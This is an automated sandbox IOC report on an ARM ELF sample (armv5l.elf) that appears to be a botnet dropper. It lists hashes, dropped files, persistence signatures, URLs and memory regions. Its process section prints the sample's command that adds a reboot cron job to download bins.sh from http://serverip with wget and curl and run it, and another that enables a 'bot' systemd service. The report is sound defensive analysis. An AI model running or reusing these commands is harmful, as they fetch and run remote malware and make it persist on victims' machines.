Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

armv5l.elf

ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy:	6.150456244954934
Filename:	armv5l.elf
Filesize:	74600
MD5:	027f2275ef988530da73aa2fd8fddf30
SHA1:	7029a2fc0422cbc11d3a4293b27032f5236c13a9
SHA256:	02ca22fed153f80fad5dfd9d63ed7e1c5afb3afa6a38cba9b7851ec06c8ffd9e
SHA512:	b770b466a0a3581a42d64beded092c4880a5ec4038834bff7478611bbdf60bb73acafe4a5bee7652a348c89373c88154002b638f88d9e2342cefa989c3fe83a0
SSDEEP:	1536:WbjzMHmZkdEd8rcKt231JG7SN4xLj/o9hgaAKnbpD/:WnzMHmZQL2FklLjYhrA4D/
Preview:	.ELF...a..........(.........4...`!......4. ...(..........................................................f..........Q.td..................................-...L."....=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.13.dr
ID:	dr_0
Target ID:	13
Process:	/tmp/armv5l.elf
Type:	ASCII text
Entropy:	4.358630015292201
Encrypted:	false
Ssdeep:	3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
Size:	178
Whitelisted:	false
Reputation:	moderate

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.bn3aJA

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.bn3aJA
Category:	dropped
Dump:	tmp.bn3aJA.22.dr
ID:	dr_2
Target ID:	22
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.1026069467163655
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLvaaqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8maOeHLUHY8mB
Size:	235
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/memfd:snapd-env-generator (deleted)

ASCII text

dropped

Details

File:	/memfd:snapd-env-generator (deleted)
Category:	dropped
Dump:	memfd_snapd-env-generator (deleted).38.dr
ID:	dr_3
Target ID:	38
Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Type:	ASCII text
Entropy:	3.7627880354948586
Encrypted:	false
Ssdeep:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
Size:	76
Whitelisted:	false
Reputation:	moderate

/usr/lib/systemd/system/bot.service

ASCII text

dropped

Details

File:	/usr/lib/systemd/system/bot.service
Category:	dropped
Dump:	bot.service.13.dr
ID:	dr_1
Target ID:	13
Process:	/tmp/armv5l.elf
Type:	ASCII text
Entropy:	4.9110117370593995
Encrypted:	false
Ssdeep:	6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
Size:	356
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/armv5l.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/bin/sh

/usr/bin/sh

sh bins.sh

/bin/sh

/bin/curl

/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/usr/bin/sh

sh bins.sh

/bin/sh

/usr/bin/crontab

crontab -

/tmp/armv5l.elf

/bin/sh

sh -c "/bin/systemctl enable bot"

/bin/sh

/bin/systemctl

/bin/systemctl enable bot

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

There are 17 hidden processes, click here to show them.

URLs

Name

Malicious

http://serverip/bins/bins.sh

unknown

Details

Name:	http://serverip/bins/bins.sh
TargetID:	22
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.bn3aJA.22.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

http://serverip/bins/bins.sh;

unknown

Details

Name:	http://serverip/bins/bins.sh;
TargetID:	13
From Memory:	true
Current Path:	/tmp/armv5l.elf
Source:	bot.service.13.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

ch.archive.ubuntu.com

unknown

host.zopz-api.com

unknown

IPs

Domain

Country

Malicious

185.125.190.26

unknown

United Kingdom

Details

IP:	185.125.190.26
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

557a4d59f000

page read and write

557a4f5b4000

page read and write

7f07eb120000

page read and write

7f06e4028000

page execute read

7f07e4021000

page read and write

7f06e4031000

page read and write

7fff5ab87000

page read and write

7f07eb804000

page read and write

7f06e4038000

page read and write

557a4d345000

page execute read

7fff5abab000

page execute read

7f07eaac1000

page read and write

7f06e4031000

page read and write

557a4d596000

page read and write

7f07eb672000

page read and write

7f06e4028000

page execute read

557a510c5000

page read and write

7f07eb491000

page read and write

7f07eb143000

page read and write

557a4f59d000

page execute and read and write

7f07e3fff000

page read and write

7f07eb491000

page read and write

7f07eaeb5000

page read and write

557a4d345000

page execute read

557a4f59d000

page execute and read and write

7f07eb804000

page read and write

7f06e4038000

page read and write

7f07eb79b000

page read and write

7f07eb2af000

page read and write

7f07eab53000

page read and write

7f07eaeb5000

page read and write

7f07eb79b000

page read and write

7f07eb2af000

page read and write

7f07ea2b9000

page read and write

557a4d59f000

page read and write

7fff5ab87000

page read and write

7f07eab53000

page read and write

7f07e4021000

page read and write

7fff5abab000

page execute read

7f06e403a000

page read and write

7f07e3fff000

page read and write

557a510c5000

page read and write

7f07eb143000

page read and write

557a4d596000

page read and write

7f07eb672000

page read and write

7f07ea2b9000

page read and write

557a510e5000

page read and write

7f07eb7bf000

page read and write

7f07eb120000

page read and write

557a4f5b4000

page read and write

7f07eb7bf000

page read and write

7f07eaac1000

page read and write

There are 42 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
armv5l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarmv5l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
armv5l.elf